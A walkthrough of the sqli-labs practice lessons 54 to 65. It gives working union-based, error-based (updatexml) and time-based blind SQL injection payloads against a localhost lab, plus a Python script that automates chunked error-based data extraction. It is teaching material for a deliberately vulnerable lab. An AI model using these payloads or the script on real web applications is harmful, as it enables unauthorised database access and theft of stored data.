sqli-labs project: https://github.com/Audi-1/sqli-labs
Less-54: the injection itself is no different from Less-1, but the level keeps a submission counter in the tryy column of its challenge table. Every submission increments it, and when it reaches 10 the table name and the secret column name are regenerated, so anything learned so far has to be thrown away. Ten submissions is still plenty: the four queries below (user and database, table name, column names, then the row itself) need only four, as long as none are wasted on guessing. The table and column names in the payloads are whatever the instance generated at the time, so yours will differ:
http://127.0.0.1/sqli-labs/Less-54/?id=-1'union select 1,user(),database()--+
http://127.0.0.1/sqli-labs/Less-54/?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
http://127.0.0.1/sqli-labs/Less-54/?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='d5fxsrk9r0'--+
http://127.0.0.1/sqli-labs/Less-54/?id=-1'union select 1,2,group_concat(id,0x7e,sessid,0x7e,secret_ZB6W,0x7e,tryy) from challenges.d5fxsrk9r0--+
Less-55: no different from the previous level except that the parameter is wrapped in parentheses, so the closing becomes ) and the submission limit is 14:
http://127.0.0.1/sqli-labs/Less-55/?id=-1)union select 1,database(),user()--+
The rest of the steps are the same as above and are not repeated. Less-56 closes with ') and Less-57 with a double quote; only the first query of each is shown:
http://127.0.0.1/sqli-labs/Less-56/?id=-1')union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
http://127.0.0.1/sqli-labs/Less-57/?id=-1"union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
Less-58: the page no longer echoes what the database returns; it prints a fixed message instead, so a union select cannot carry data out through the normal output. MySQL errors are still displayed, though, so error-based injection works: updatexml() throws an XPATH syntax error that quotes the invalid XPath string, and the 0x7e ('~') on either side guarantees the string is invalid. Keep in mind that MySQL truncates the quoted string to 32 characters, so a long group_concat() has to be read out in substr() pieces:
http://127.0.0.1/sqli-labs/Less-58/?id=-1'union select 1,2,updatexml(0x7e,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),0x7e)--+
Less-59: the same as the previous level except that id is numeric, so nothing needs closing and the payload follows the value directly; still error-based. Less-60 closes with ") and Less-61 with ')):
http://127.0.0.1/sqli-labs/Less-59/?id=-1 union select 1,2,updatexml(0x7e,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),0x7e)--+
http://127.0.0.1/sqli-labs/Less-60/?id=-1")union select 1,2,updatexml(0x7e,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),0x7e)--+
http://127.0.0.1/sqli-labs/Less-61/?id=-1'))union select 1,2,updatexml(0x7e,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),0x7e)--+
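The following is an added example, not code from the page or the sqli-labs project. It automates the error-based extraction used for Less-58 to Less-61 and deals with the 32-character limit of the updatexml() error: the page's concat(0x7e,X,0x7e) form only ever shows the first 31 characters of X, so the script reads X in substr() chunks of 31 instead. The level prefixes are the closings from the page's payloads; the real transport (http_ask, using the requests library) is an assumption about how you would talk to the lab, and fake_backend is a simulated MySQL that answers the same payloads from a constructed value so the script runs offline.

```python
"""Error-based extraction for sqli-labs Less-58..61 (added example).

updatexml() echoes the offending XPath string in its error message, but
MySQL truncates that string to 32 characters.  One character goes to the
0x7e ('~') marker that makes the string invalid XPath, so 31 characters of
data come back per request.
"""
import re

XPATH_MAX = 32            # MySQL's limit on the string quoted in "XPATH syntax error"
CHUNK = XPATH_MAX - 1     # the leading '~' marker costs one character

# How each level wraps ?id= (taken from the page's payloads).
PREFIX = {58: "-1'", 59: "-1", 60: '-1")', 61: "-1'))"}

# Constructed sample value and the subquery the page uses for it.
INNER = "select group_concat(table_name) from information_schema.tables where table_schema='challenges'"
SAMPLE = "d5fxsrk9r0,emails,referers,uagents,users"   # constructed, 40 characters

ERROR_RE = re.compile(r"XPATH syntax error: '(.*?)'")


def naive_payload(level: int, inner_select: str) -> str:
    """The page's form: whole value at once, silently cut to 31 characters."""
    return (f"{PREFIX[level]} union select 1,2,"
            f"updatexml(0x7e,concat(0x7e,({inner_select}),0x7e),0x7e)-- ")


def chunk_payload(level: int, inner_select: str, offset: int, chunk: int = CHUNK) -> str:
    """One request returning characters offset..offset+chunk-1 of the subquery result."""
    piece = f"substr(({inner_select}),{offset},{chunk})"
    return (f"{PREFIX[level]} union select 1,2,"
            f"updatexml(0x7e,concat(0x7e,{piece}),0x7e)-- ")


def parse_error(body: str):
    """Pull the data back out of the error text; None if no error or marker is present."""
    m = ERROR_RE.search(body)
    if not m or not m.group(1).startswith("~"):
        return None
    return m.group(1)[1:]          # strip the '~' marker


def dump(ask, level: int, inner_select: str, chunk: int = CHUNK) -> str:
    """Walk the value chunk by chunk until a short or empty piece comes back."""
    out, offset = "", 1
    while True:
        piece = parse_error(ask(chunk_payload(level, inner_select, offset, chunk)))
        if not piece:              # substr() past the end returns '' -> error quotes just '~'
            break
        out += piece
        if len(piece) < chunk:     # last, partial chunk
            break
        offset += chunk
    return out


def http_ask(level: int, base: str = "http://127.0.0.1/sqli-labs"):
    """Real transport (assumed): GET the payload and hand back the page body.
    requests encodes the trailing '-- ' space itself; the raw-URL '--+' form is not needed here."""
    import requests                # only needed when actually talking to the lab
    def ask(payload: str) -> str:
        return requests.get(f"{base}/Less-{level}/", params={"id": payload}, timeout=10).text
    return ask


_SUBSTR_RE = re.compile(r"substr\(\(.*?\),(\d+),(\d+)\)")

def fake_backend(value: str):
    """Offline stand-in for MySQL: evaluates the substr() in the payload against a
    constructed value and formats the error as MySQL does, including the truncation."""
    def ask(payload: str) -> str:
        m = _SUBSTR_RE.search(payload)
        if m:                                   # chunked payload
            off, n = int(m.group(1)), int(m.group(2))
            xpath = "~" + value[off - 1:off - 1 + n]
        else:                                   # the page's naive form
            xpath = "~" + value + "~"
        return f"XPATH syntax error: '{xpath[:XPATH_MAX]}'"
    return ask


if __name__ == "__main__":
    ask = fake_backend(SAMPLE)
    print("naive :", parse_error(ask(naive_payload(58, INNER))))   # only 31 characters
    print("chunks:", dump(ask, 58, INNER))                          # the whole value
```

Against the lab, replace fake_backend(SAMPLE) with http_ask(58) and the same dump() call works; each chunk costs one submission, so a 40-character table list takes two rather than the one truncated attempt the page's payload gives.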
Less-62 to Less-65 are done with time-based blind injection: each payload sleeps for 3 seconds when the first byte of database() is 99 ('c'), and a slow response confirms the guess. The closings are '), ', )) and ") in turn:
http://127.0.0.1/sqli-labs/Less-62/?id=1') and if(ascii(substr(database(),1,1))=99,sleep(3),1)--+
http://127.0.0.1/sqli-labs/Less-63/?id=1'and if(ascii(substr(database(),1,1))=99,sleep(3),1)--+
http://127.0.0.1/sqli-labs/Less-64/?id=1))and if(ascii(substr(database(),1,1))=99,sleep(3),1)--+
http://127.0.0.1/sqli-labs/Less-65/?id=1") and if(ascii(substr(database(),1,1))=99,sleep(3),1)--+